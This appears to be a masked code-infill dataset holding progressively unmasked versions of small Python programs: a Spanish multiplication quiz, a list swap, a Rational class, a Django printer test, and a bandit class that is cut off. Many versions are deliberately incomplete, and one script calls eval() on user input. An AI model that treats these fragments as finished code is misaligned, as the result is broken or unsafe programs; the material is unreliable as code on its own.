print('El numero de preguntas debe ser al menos 1')
cantidad = int(input('Numero de preguntas: '))
for i in range(cantidad):
numero = randint(2, 10)
numero2 = randint(2, 10)
aleatorio = int(input('¿Cuanto es %d * %d? ' % (numero, numero2)))
if numero * numero2 == aleatorio:
print('Correcto')
contador_bien = contador_bien + 1
else:
print('Incorrecto')
contador_mal = contador_mal + 1
print('Ha contestado bien', contador_bien, 'preguntas')
print('Ha contestado mal', contador_mal, 'preguntas')
<mask token>
print('Le corresponde una nota de %.2f' % nota)
| <mask token>
cantidad = int(input('Numero de preguntas: '))
contador_bien = 0
contador_mal = 0
while cantidad <= 0:
print('El numero de preguntas debe ser al menos 1')
cantidad = int(input('Numero de preguntas: '))
for i in range(cantidad):
numero = randint(2, 10)
numero2 = randint(2, 10)
aleatorio = int(input('¿Cuanto es %d * %d? ' % (numero, numero2)))
if numero * numero2 == aleatorio:
print('Correcto')
contador_bien = contador_bien + 1
else:
print('Incorrecto')
contador_mal = contador_mal + 1
print('Ha contestado bien', contador_bien, 'preguntas')
print('Ha contestado mal', contador_mal, 'preguntas')
nota = contador_bien / cantidad * 10
print('Le corresponde una nota de %.2f' % nota)
| from random import randint
cantidad = int(input('Numero de preguntas: '))
contador_bien = 0
contador_mal = 0
while cantidad <= 0:
print('El numero de preguntas debe ser al menos 1')
cantidad = int(input('Numero de preguntas: '))
for i in range(cantidad):
numero = randint(2, 10)
numero2 = randint(2, 10)
aleatorio = int(input('¿Cuanto es %d * %d? ' % (numero, numero2)))
if numero * numero2 == aleatorio:
print('Correcto')
contador_bien = contador_bien + 1
else:
print('Incorrecto')
contador_mal = contador_mal + 1
print('Ha contestado bien', contador_bien, 'preguntas')
print('Ha contestado mal', contador_mal, 'preguntas')
nota = contador_bien / cantidad * 10
print('Le corresponde una nota de %.2f' % nota)
| from random import randint
cantidad = int(input("Numero de preguntas: "))
contador_bien = 0
contador_mal = 0
while cantidad <= 0:
print ("El numero de preguntas debe ser al menos 1")
cantidad = int(input("Numero de preguntas: "))
for i in range(cantidad):
numero = randint(2,10)
numero2 = randint(2,10)
aleatorio = int(input("¿Cuanto es %d * %d? " % (numero, numero2)))
if numero * numero2 == aleatorio:
print ("Correcto")
contador_bien = contador_bien + 1
else:
print ("Incorrecto")
contador_mal = contador_mal + 1
print ("Ha contestado bien", contador_bien, "preguntas")
print ("Ha contestado mal", contador_mal, "preguntas")
nota = (contador_bien / cantidad) * 10
print ("Le corresponde una nota de %.2f"%nota) | [
0,
1,
2,
3,
4
] |
656 | 18435f43e2f52e3d2e9ff6411f8dd0510d2da54d | <mask token>
| <mask token>
if n % 2 == 0:
for i in range(0, n // 2):
a[i], a[n // 2 + i] = a[n // 2 + i], a[i]
print('after swap:', a)
else:
for i in range(0, n // 2):
a[i], a[n // 2 + i + 1] = a[n // 2 + i + 1], a[i]
print('after swap:', a)
| a = eval(input('enter a list: '))
n = len(a)
if n % 2 == 0:
for i in range(0, n // 2):
a[i], a[n // 2 + i] = a[n // 2 + i], a[i]
print('after swap:', a)
else:
for i in range(0, n // 2):
a[i], a[n // 2 + i + 1] = a[n // 2 + i + 1], a[i]
print('after swap:', a)
| a=eval(input('enter a list: '))
n=len(a)
if (n%2==0):
for i in range(0,n//2):
a[i],a[n//2+i]=a[n//2+i],a[i]
print('after swap:',a)
else:
for i in range(0,n//2):
a[i],a[n//2+i+1]=a[n//2+i+1],a[i]
print('after swap:',a)
| null | [
0,
1,
2,
3
] |
657 | b1ab28a99fdcce66f0a1e4e25821073673f531cf | <mask token>
class Rational(object):
<mask token>
def __init__(self, num, den):
"""
simple constructor
"""
if den == 0:
raise ZeroDivisionError('division by zero')
if num == 0:
self._num = 0
self._den = 1
else:
sign = 1
if num * den < 0:
sign = -1
abs_num = abs(num)
abs_den = abs(den)
divisor = _gcd(abs_num, abs_den)
self._num = sign * abs_num // divisor
self._den = abs_den // divisor
def __add__(self, other):
"""
'+' operator
"""
if isinstance(other, int):
return Rational(self.num + self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den + self.den * other.num, self.
den * other.den)
<mask token>
def __sub__(self, other):
"""
'-' binary operator
"""
if isinstance(other, int):
return Rational(self.num - self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den - self.den * other.num, self.
den * other.den)
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
def __rfloordiv__(self, other):
"""
fallback of '//' operator
"""
return self.__rtruediv__(other)
def __div__(self, other):
"""
'/' operator
"""
return self.__truediv__(other)
<mask token>
def __mod__(self, other):
"""
'%' operator
"""
if isinstance(other, int):
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
if not isinstance(other, Rational):
return NotImplemented
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
def __rmod__(self, other):
"""
fallback of '%' operator
"""
if self == Rational(0, 1):
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
def __divmod__(self, other):
"""
'divmod()' operation
"""
quot = self.__floordiv__(other)
res = self.__mod__(other)
if quot != NotImplemented and res != NotImplemented:
return quot, res
return NotImplemented
def __rdivmod__(self, other):
"""
fallback of 'divmod()' operation
"""
quot = self.__rfloordiv__(other)
res = self.__rmod__(other)
if quot != NotImplemented and res != NotImplemented:
return quot, res
return NotImplemented
def __pos__(self):
"""
'+' unary operator
"""
return self
def __neg__(self):
"""
'-' unary operator
"""
return Rational(-1 * self.num, self.den)
def __abs__(self):
"""
absolute value
"""
return Rational(abs(self.num), self.den)
def __lt__(self, other):
"""
'<' operator
"""
if isinstance(other, int):
return self.num - other * self.den < 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den < 0
<mask token>
<mask token>
def __ne__(self, other):
"""
'!=' or '<>' operator
"""
if isinstance(other, int):
return self.num - other * self.den != 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den != 0
<mask token>
<mask token>
<mask token>
<mask token>
def __str__(self):
"""
'informal' string representation
"""
ret = str(self.num)
if self.den != 1:
ret += '/' + str(self.den)
return ret
<mask token>
def __bool__(self):
"""
'bool()' operation
"""
return self.num != 0
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
| <mask token>
class Rational(object):
<mask token>
def __init__(self, num, den):
"""
simple constructor
"""
if den == 0:
raise ZeroDivisionError('division by zero')
if num == 0:
self._num = 0
self._den = 1
else:
sign = 1
if num * den < 0:
sign = -1
abs_num = abs(num)
abs_den = abs(den)
divisor = _gcd(abs_num, abs_den)
self._num = sign * abs_num // divisor
self._den = abs_den // divisor
def __add__(self, other):
"""
'+' operator
"""
if isinstance(other, int):
return Rational(self.num + self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den + self.den * other.num, self.
den * other.den)
def __radd__(self, other):
"""
fallback of '+' operator
"""
if isinstance(other, int):
return self.__add__(other)
return NotImplemented
def __sub__(self, other):
"""
'-' binary operator
"""
if isinstance(other, int):
return Rational(self.num - self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den - self.den * other.num, self.
den * other.den)
def __rsub__(self, other):
"""
fallback of '-' binary operator
"""
if isinstance(other, int):
return self.__neg__().__add__(-other)
return NotImplemented
def __mul__(self, other):
"""
'*' operator
"""
if isinstance(other, int):
return Rational(self.num * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.num, self.den * other.den)
def __rmul__(self, other):
"""
fallback of '*' operator
"""
return self.__mul__(other)
<mask token>
def __rtruediv__(self, other):
"""
fallback of '/' operator when '__future__.division' is in effect
"""
if isinstance(other, int):
return Rational(self.den * other, self.num)
return NotImplemented
<mask token>
def __rfloordiv__(self, other):
"""
fallback of '//' operator
"""
return self.__rtruediv__(other)
def __div__(self, other):
"""
'/' operator
"""
return self.__truediv__(other)
def __rdiv__(self, other):
"""
fallback of '/' operator
"""
return self.__rtruediv__(other)
def __mod__(self, other):
"""
'%' operator
"""
if isinstance(other, int):
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
if not isinstance(other, Rational):
return NotImplemented
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
def __rmod__(self, other):
"""
fallback of '%' operator
"""
if self == Rational(0, 1):
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
def __divmod__(self, other):
"""
'divmod()' operation
"""
quot = self.__floordiv__(other)
res = self.__mod__(other)
if quot != NotImplemented and res != NotImplemented:
return quot, res
return NotImplemented
def __rdivmod__(self, other):
"""
fallback of 'divmod()' operation
"""
quot = self.__rfloordiv__(other)
res = self.__rmod__(other)
if quot != NotImplemented and res != NotImplemented:
return quot, res
return NotImplemented
def __pos__(self):
"""
'+' unary operator
"""
return self
def __neg__(self):
"""
'-' unary operator
"""
return Rational(-1 * self.num, self.den)
def __abs__(self):
"""
absolute value
"""
return Rational(abs(self.num), self.den)
def __lt__(self, other):
"""
'<' operator
"""
if isinstance(other, int):
return self.num - other * self.den < 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den < 0
def __le__(self, other):
"""
'<=' operator
"""
if isinstance(other, int):
return self.num - other * self.den <= 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den <= 0
def __eq__(self, other):
"""
'==' operator
"""
if isinstance(other, int):
return self.num - other * self.den == 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den == 0
def __ne__(self, other):
"""
'!=' or '<>' operator
"""
if isinstance(other, int):
return self.num - other * self.den != 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den != 0
def __gt__(self, other):
"""
'>' operator
"""
if isinstance(other, int):
return self.num - other * self.den > 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den > 0
def __ge__(self, other):
"""
'>=' operator
"""
if isinstance(other, int):
return self.num - other * self.den >= 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den >= 0
<mask token>
def __repr__(self):
"""
'official' string representation
"""
return '<Rational: num=%d, den=%d>' % (self.num, self.den)
def __str__(self):
"""
'informal' string representation
"""
ret = str(self.num)
if self.den != 1:
ret += '/' + str(self.den)
return ret
<mask token>
def __bool__(self):
"""
'bool()' operation
"""
return self.num != 0
<mask token>
def num(self):
"""
returns numerator of Rational
"""
return self.num
def den(self):
"""
returns denominator of Rational
"""
return self.den
<mask token>
<mask token>
<mask token>
<mask token>
| <mask token>
class Rational(object):
<mask token>
def __init__(self, num, den):
"""
simple constructor
"""
if den == 0:
raise ZeroDivisionError('division by zero')
if num == 0:
self._num = 0
self._den = 1
else:
sign = 1
if num * den < 0:
sign = -1
abs_num = abs(num)
abs_den = abs(den)
divisor = _gcd(abs_num, abs_den)
self._num = sign * abs_num // divisor
self._den = abs_den // divisor
def __add__(self, other):
"""
'+' operator
"""
if isinstance(other, int):
return Rational(self.num + self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den + self.den * other.num, self.
den * other.den)
def __radd__(self, other):
"""
fallback of '+' operator
"""
if isinstance(other, int):
return self.__add__(other)
return NotImplemented
def __sub__(self, other):
"""
'-' binary operator
"""
if isinstance(other, int):
return Rational(self.num - self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den - self.den * other.num, self.
den * other.den)
def __rsub__(self, other):
"""
fallback of '-' binary operator
"""
if isinstance(other, int):
return self.__neg__().__add__(-other)
return NotImplemented
def __mul__(self, other):
"""
'*' operator
"""
if isinstance(other, int):
return Rational(self.num * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.num, self.den * other.den)
def __rmul__(self, other):
"""
fallback of '*' operator
"""
return self.__mul__(other)
<mask token>
def __rtruediv__(self, other):
"""
fallback of '/' operator when '__future__.division' is in effect
"""
if isinstance(other, int):
return Rational(self.den * other, self.num)
return NotImplemented
def __floordiv__(self, other):
"""
'//' operator
"""
return self.__truediv__(other)
def __rfloordiv__(self, other):
"""
fallback of '//' operator
"""
return self.__rtruediv__(other)
def __div__(self, other):
"""
'/' operator
"""
return self.__truediv__(other)
def __rdiv__(self, other):
"""
fallback of '/' operator
"""
return self.__rtruediv__(other)
def __mod__(self, other):
"""
'%' operator
"""
if isinstance(other, int):
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
if not isinstance(other, Rational):
return NotImplemented
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
def __rmod__(self, other):
"""
fallback of '%' operator
"""
if self == Rational(0, 1):
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
def __divmod__(self, other):
"""
'divmod()' operation
"""
quot = self.__floordiv__(other)
res = self.__mod__(other)
if quot != NotImplemented and res != NotImplemented:
return quot, res
return NotImplemented
def __rdivmod__(self, other):
"""
fallback of 'divmod()' operation
"""
quot = self.__rfloordiv__(other)
res = self.__rmod__(other)
if quot != NotImplemented and res != NotImplemented:
return quot, res
return NotImplemented
def __pos__(self):
"""
'+' unary operator
"""
return self
def __neg__(self):
"""
'-' unary operator
"""
return Rational(-1 * self.num, self.den)
def __abs__(self):
"""
absolute value
"""
return Rational(abs(self.num), self.den)
def __lt__(self, other):
"""
'<' operator
"""
if isinstance(other, int):
return self.num - other * self.den < 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den < 0
def __le__(self, other):
"""
'<=' operator
"""
if isinstance(other, int):
return self.num - other * self.den <= 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den <= 0
def __eq__(self, other):
"""
'==' operator
"""
if isinstance(other, int):
return self.num - other * self.den == 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den == 0
def __ne__(self, other):
"""
'!=' or '<>' operator
"""
if isinstance(other, int):
return self.num - other * self.den != 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den != 0
def __gt__(self, other):
"""
'>' operator
"""
if isinstance(other, int):
return self.num - other * self.den > 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den > 0
def __ge__(self, other):
"""
'>=' operator
"""
if isinstance(other, int):
return self.num - other * self.den >= 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den >= 0
def __hash__(self):
"""
calc hash value
"""
return hash((self.num, self.den))
def __repr__(self):
"""
'official' string representation
"""
return '<Rational: num=%d, den=%d>' % (self.num, self.den)
def __str__(self):
"""
'informal' string representation
"""
ret = str(self.num)
if self.den != 1:
ret += '/' + str(self.den)
return ret
def __bytes__(self):
"""
'bytes()' operation
"""
return bytes(str(self), 'utf8')
def __bool__(self):
"""
'bool()' operation
"""
return self.num != 0
<mask token>
def num(self):
"""
returns numerator of Rational
"""
return self.num
def den(self):
"""
returns denominator of Rational
"""
return self.den
<mask token>
<mask token>
<mask token>
<mask token>
| <mask token>
class Rational(object):
<mask token>
def __init__(self, num, den):
"""
simple constructor
"""
if den == 0:
raise ZeroDivisionError('division by zero')
if num == 0:
self._num = 0
self._den = 1
else:
sign = 1
if num * den < 0:
sign = -1
abs_num = abs(num)
abs_den = abs(den)
divisor = _gcd(abs_num, abs_den)
self._num = sign * abs_num // divisor
self._den = abs_den // divisor
def __add__(self, other):
"""
'+' operator
"""
if isinstance(other, int):
return Rational(self.num + self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den + self.den * other.num, self.
den * other.den)
def __radd__(self, other):
"""
fallback of '+' operator
"""
if isinstance(other, int):
return self.__add__(other)
return NotImplemented
def __sub__(self, other):
"""
'-' binary operator
"""
if isinstance(other, int):
return Rational(self.num - self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den - self.den * other.num, self.
den * other.den)
def __rsub__(self, other):
"""
fallback of '-' binary operator
"""
if isinstance(other, int):
return self.__neg__().__add__(-other)
return NotImplemented
def __mul__(self, other):
"""
'*' operator
"""
if isinstance(other, int):
return Rational(self.num * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.num, self.den * other.den)
def __rmul__(self, other):
"""
fallback of '*' operator
"""
return self.__mul__(other)
<mask token>
def __rtruediv__(self, other):
"""
fallback of '/' operator when '__future__.division' is in effect
"""
if isinstance(other, int):
return Rational(self.den * other, self.num)
return NotImplemented
def __floordiv__(self, other):
"""
'//' operator
"""
return self.__truediv__(other)
def __rfloordiv__(self, other):
"""
fallback of '//' operator
"""
return self.__rtruediv__(other)
def __div__(self, other):
"""
'/' operator
"""
return self.__truediv__(other)
def __rdiv__(self, other):
"""
fallback of '/' operator
"""
return self.__rtruediv__(other)
def __mod__(self, other):
"""
'%' operator
"""
if isinstance(other, int):
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
if not isinstance(other, Rational):
return NotImplemented
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
def __rmod__(self, other):
"""
fallback of '%' operator
"""
if self == Rational(0, 1):
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
def __divmod__(self, other):
"""
'divmod()' operation
"""
quot = self.__floordiv__(other)
res = self.__mod__(other)
if quot != NotImplemented and res != NotImplemented:
return quot, res
return NotImplemented
def __rdivmod__(self, other):
"""
fallback of 'divmod()' operation
"""
quot = self.__rfloordiv__(other)
res = self.__rmod__(other)
if quot != NotImplemented and res != NotImplemented:
return quot, res
return NotImplemented
def __pos__(self):
"""
'+' unary operator
"""
return self
def __neg__(self):
"""
'-' unary operator
"""
return Rational(-1 * self.num, self.den)
def __abs__(self):
"""
absolute value
"""
return Rational(abs(self.num), self.den)
def __lt__(self, other):
"""
'<' operator
"""
if isinstance(other, int):
return self.num - other * self.den < 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den < 0
def __le__(self, other):
"""
'<=' operator
"""
if isinstance(other, int):
return self.num - other * self.den <= 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den <= 0
def __eq__(self, other):
"""
'==' operator
"""
if isinstance(other, int):
return self.num - other * self.den == 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den == 0
def __ne__(self, other):
"""
'!=' or '<>' operator
"""
if isinstance(other, int):
return self.num - other * self.den != 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den != 0
def __gt__(self, other):
"""
'>' operator
"""
if isinstance(other, int):
return self.num - other * self.den > 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den > 0
def __ge__(self, other):
"""
'>=' operator
"""
if isinstance(other, int):
return self.num - other * self.den >= 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den >= 0
def __hash__(self):
"""
calc hash value
"""
return hash((self.num, self.den))
def __repr__(self):
"""
'official' string representation
"""
return '<Rational: num=%d, den=%d>' % (self.num, self.den)
def __str__(self):
"""
'informal' string representation
"""
ret = str(self.num)
if self.den != 1:
ret += '/' + str(self.den)
return ret
def __bytes__(self):
"""
'bytes()' operation
"""
return bytes(str(self), 'utf8')
def __bool__(self):
"""
'bool()' operation
"""
return self.num != 0
def isinteger(self):
"""
Does this Rational instance represent integer?
"""
return self.den == 1
def num(self):
"""
returns numerator of Rational
"""
return self.num
def den(self):
"""
returns denominator of Rational
"""
return self.den
@staticmethod
def parse(string):
"""
parse string to Rational
"""
posslash = string.find('/')
if posslash < 0:
return Rational(int(string), 1)
else:
strs = string.split('/')
return Rational(int(strs[0].strip()), int(strs[1].strip()))
<mask token>
<mask token>
<mask token>
| """
module rational number
"""
def _gcd(num_a, num_b):
"""
gratest common divisor
"""
if num_a == 0 or num_b == 0:
raise ArithmeticError('gcd of zero')
var_p = num_a
var_q = num_b
if var_p < var_q:
var_p = num_b
var_q = num_a
var_r = var_p % var_q
while var_r != 0:
var_p = var_q
var_q = var_r
var_r = var_p % var_q
return var_q
class Rational(object):
"""
representing rational number
"""
def __init__(self, num, den):
"""
simple constructor
"""
if den == 0:
raise ZeroDivisionError('division by zero')
if num == 0:
self._num = 0
self._den = 1
else:
sign = 1
if num * den < 0:
sign = -1
abs_num = abs(num)
abs_den = abs(den)
divisor = _gcd(abs_num, abs_den)
self._num = sign * abs_num // divisor
self._den = abs_den // divisor
#
def __add__(self, other):
"""
'+' operator
"""
# supported type for operand except Rational
if isinstance(other, int):
return Rational(self.num + self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den + self.den * other.num, self.den * other.den)
def __radd__(self, other):
"""
fallback of '+' operator
"""
if isinstance(other, int):
return self.__add__(other)
return NotImplemented
#
def __sub__(self, other):
"""
'-' binary operator
"""
# supported type for operand except Rational
if isinstance(other, int):
return Rational(self.num - self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den - self.den * other.num, self.den * other.den)
def __rsub__(self, other):
"""
fallback of '-' binary operator
"""
if isinstance(other, int):
return self.__neg__().__add__(- other)
return NotImplemented
#
def __mul__(self, other):
"""
'*' operator
"""
# supported type for operand except Rational
if isinstance(other, int):
return Rational(self.num * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.num, self.den * other.den)
def __rmul__(self, other):
"""
fallback of '*' operator
"""
return self.__mul__(other)
#
def __truediv__(self, other):
"""
'/' operator when '__future__.division' is in effect
"""
# supported type for operand except Rational
if isinstance(other, int):
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(self.num, self.den * other)
if not isinstance(other, Rational):
return NotImplemented
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(self.num * other.den, self.den * other.num)
def __rtruediv__(self, other):
"""
fallback of '/' operator when '__future__.division' is in effect
"""
if isinstance(other, int):
return Rational(self.den * other, self.num)
return NotImplemented
#
def __floordiv__(self, other):
"""
'//' operator
"""
return self.__truediv__(other)
def __rfloordiv__(self, other):
"""
fallback of '//' operator
"""
return self.__rtruediv__(other)
#
def __div__(self, other):
"""
'/' operator
"""
return self.__truediv__(other)
def __rdiv__(self, other):
"""
fallback of '/' operator
"""
return self.__rtruediv__(other)
#
def __mod__(self, other):
"""
'%' operator
"""
if isinstance(other, int):
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
if not isinstance(other, Rational):
return NotImplemented
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
def __rmod__(self, other):
"""
fallback of '%' operator
"""
if self == Rational(0, 1):
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
#
def __divmod__(self, other):
"""
'divmod()' operation
"""
quot = self.__floordiv__(other)
res = self.__mod__(other)
if quot != NotImplemented and res != NotImplemented:
return (quot, res)
return NotImplemented
def __rdivmod__(self, other):
"""
fallback of 'divmod()' operation
"""
quot = self.__rfloordiv__(other)
res = self.__rmod__(other)
if quot != NotImplemented and res != NotImplemented:
return (quot, res)
return NotImplemented
#
def __pos__(self):
"""
'+' unary operator
"""
return self
#
def __neg__(self):
"""
'-' unary operator
"""
return Rational(-1 * self.num, self.den)
#
def __abs__(self):
"""
absolute value
"""
return Rational(abs(self.num), self.den)
#
# "rich comparison" method
def __lt__(self, other):
"""
'<' operator
"""
# supported type for operand except Rational
if isinstance(other, int):
return self.num - other * self.den < 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den < 0
#
def __le__(self, other):
"""
'<=' operator
"""
# supported type for operand except Rational
if isinstance(other, int):
return self.num - other * self.den <= 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den <= 0
#
def __eq__(self, other):
"""
'==' operator
"""
# supported type for operand except Rational
if isinstance(other, int):
return self.num - other * self.den == 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den == 0
#
def __ne__(self, other):
"""
'!=' or '<>' operator
"""
# supported type for operand except Rational
if isinstance(other, int):
return self.num - other * self.den != 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den != 0
#
def __gt__(self, other):
"""
'>' operator
"""
# supported type for operand except Rational
if isinstance(other, int):
return self.num - other * self.den > 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den > 0
#
def __ge__(self, other):
"""
'>=' operator
"""
# supported type for operand except Rational
if isinstance(other, int):
return self.num - other * self.den >= 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den >= 0
#
def __hash__(self):
"""
calc hash value
"""
return hash((self.num, self.den))
#
def __repr__(self):
"""
'official' string representation
"""
return '<Rational: num=%d, den=%d>' % (self.num, self.den)
#
def __str__(self):
"""
'informal' string representation
"""
ret = str(self.num)
if self.den != 1:
ret += '/' + str(self.den)
return ret
#
def __bytes__(self):
"""
'bytes()' operation
"""
return bytes(str(self), 'utf8')
#
def __bool__(self):
"""
'bool()' operation
"""
return self.num != 0
#
def isinteger(self):
"""
Does this Rational instance represent integer?
"""
return self.den == 1
#
def num(self):
"""
returns numerator of Rational
"""
return self.num
#
def den(self):
"""
returns denominator of Rational
"""
return self.den
#
@staticmethod
def parse(string):
"""
parse string to Rational
"""
posslash = string.find('/')
if posslash < 0:
return Rational(int(string), 1)
else:
strs = string.split('/')
return Rational(int(strs[0].strip()), int(strs[1].strip()))
#
ZERO = None
ONE = None
Rational.ZERO = Rational(0, 1)
Rational.ONE = Rational(1, 1)
| [
17,
30,
33,
35,
41
] |
658 | 5e0cba6952cdc677c640a0df325426ffc89189cd | <mask token>
class TestSunlumoProjectPrinter(TestCase):
<mask token>
<mask token>
| <mask token>
class TestSunlumoProjectPrinter(TestCase):
def test_printer(self):
sl_prj = Printer('./sunlumo_mapserver/test_data/test_sunlumo.qgs')
tmpFile = '/tmp/printtmp'
sl_prj.printToPdf({'tmpFile': tmpFile, 'layout': 'test_layout',
'bbox': [-2, -2, 2, 2], 'layers': ['polygons', 'lines',
'points'], 'transparencies': [50, 0, 0]})
with open(tmpFile + '.pdf', 'rb') as pdfFile:
data = pdfFile.read()
self.assertEqual(len(data), 426652)
<mask token>
| <mask token>
class TestSunlumoProjectPrinter(TestCase):
def test_printer(self):
sl_prj = Printer('./sunlumo_mapserver/test_data/test_sunlumo.qgs')
tmpFile = '/tmp/printtmp'
sl_prj.printToPdf({'tmpFile': tmpFile, 'layout': 'test_layout',
'bbox': [-2, -2, 2, 2], 'layers': ['polygons', 'lines',
'points'], 'transparencies': [50, 0, 0]})
with open(tmpFile + '.pdf', 'rb') as pdfFile:
data = pdfFile.read()
self.assertEqual(len(data), 426652)
def test_printer_missing_required_params(self):
sl_prj = Printer('./sunlumo_mapserver/test_data/test_sunlumo.qgs')
with self.assertRaises(RuntimeError):
sl_prj.printToPdf({})
| from django.test import TestCase
from ..printer import Printer
class TestSunlumoProjectPrinter(TestCase):
def test_printer(self):
sl_prj = Printer('./sunlumo_mapserver/test_data/test_sunlumo.qgs')
tmpFile = '/tmp/printtmp'
sl_prj.printToPdf({'tmpFile': tmpFile, 'layout': 'test_layout',
'bbox': [-2, -2, 2, 2], 'layers': ['polygons', 'lines',
'points'], 'transparencies': [50, 0, 0]})
with open(tmpFile + '.pdf', 'rb') as pdfFile:
data = pdfFile.read()
self.assertEqual(len(data), 426652)
def test_printer_missing_required_params(self):
sl_prj = Printer('./sunlumo_mapserver/test_data/test_sunlumo.qgs')
with self.assertRaises(RuntimeError):
sl_prj.printToPdf({})
| # -*- coding: utf-8 -*-
from django.test import TestCase
from ..printer import Printer
class TestSunlumoProjectPrinter(TestCase):
def test_printer(self):
sl_prj = Printer('./sunlumo_mapserver/test_data/test_sunlumo.qgs')
tmpFile = '/tmp/printtmp'
sl_prj.printToPdf({
'tmpFile': tmpFile, 'layout': 'test_layout',
'bbox': [-2, -2, 2, 2], 'layers': ['polygons', 'lines', 'points'],
'transparencies': [50, 0, 0]
})
with open(tmpFile + '.pdf', 'rb') as pdfFile:
# we just want to test if the PDF file in not blank
data = pdfFile.read()
self.assertEqual(len(data), 426652)
def test_printer_missing_required_params(self):
sl_prj = Printer('./sunlumo_mapserver/test_data/test_sunlumo.qgs')
with self.assertRaises(RuntimeError):
sl_prj.printToPdf({})
| [
1,
2,
3,
4,
5
] |
659 | 49df9db508637ce5914aa6591178a03c609b6bc7 | <mask token>
class TS_RLR:
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
| <mask token>
class TS_RLR:
def __init__(self, alpha):
self.d = 6
self.k = 6
self.alpha = alpha
self.batch_size = 1000
self.training_size = 1000
self.impressions = 0
self.batch_ids = list([])
self.batch_clicks = np.array([])
self.articles_1_d = np.array([])
self.article_ids = dict()
self.bad_articles = set()
self.mu = np.zeros(self.d)
self.q = self.alpha * np.ones(self.d)
<mask token>
def add_new_article(self, line):
article_id = int(line.split(' ')[0])
if article_id in self.bad_articles:
return -1
if article_id not in self.article_ids:
try:
article = to_vector(line)
except IndexError:
self.bad_articles.add(article_id)
return -1
self.article_ids[article_id] = len(self.article_ids)
self.articles_1_d = np.append(self.articles_1_d, article).reshape([
len(self.article_ids), self.d])
return article_id
def to_minimize(self, w):
return 1 / 2 * sum(self.q * (w - self.mu) * (w - self.mu)) + sum(np
.log(1 + np.exp(-self.batch_clicks * w.dot(self.batch_articles))))
def update(self, user, selected_article, click):
self.impressions += 1
self.batch_ids.append(self.article_ids[selected_article])
self.batch_clicks = np.append(self.batch_clicks, click)
if self.impressions % self.batch_size == 0:
w = np.random.normal(0, 1, self.d)
self.batch_articles = self.articles_1_d[self.batch_ids].reshape([
self.d, self.batch_size])
res = minimize(self.to_minimize, w, method='nelder-mead',
options={'xtol': 1e-08, 'disp': False})
self.m = res.x
p = 1 / (1 + np.exp(-self.m.dot(self.batch_articles)))
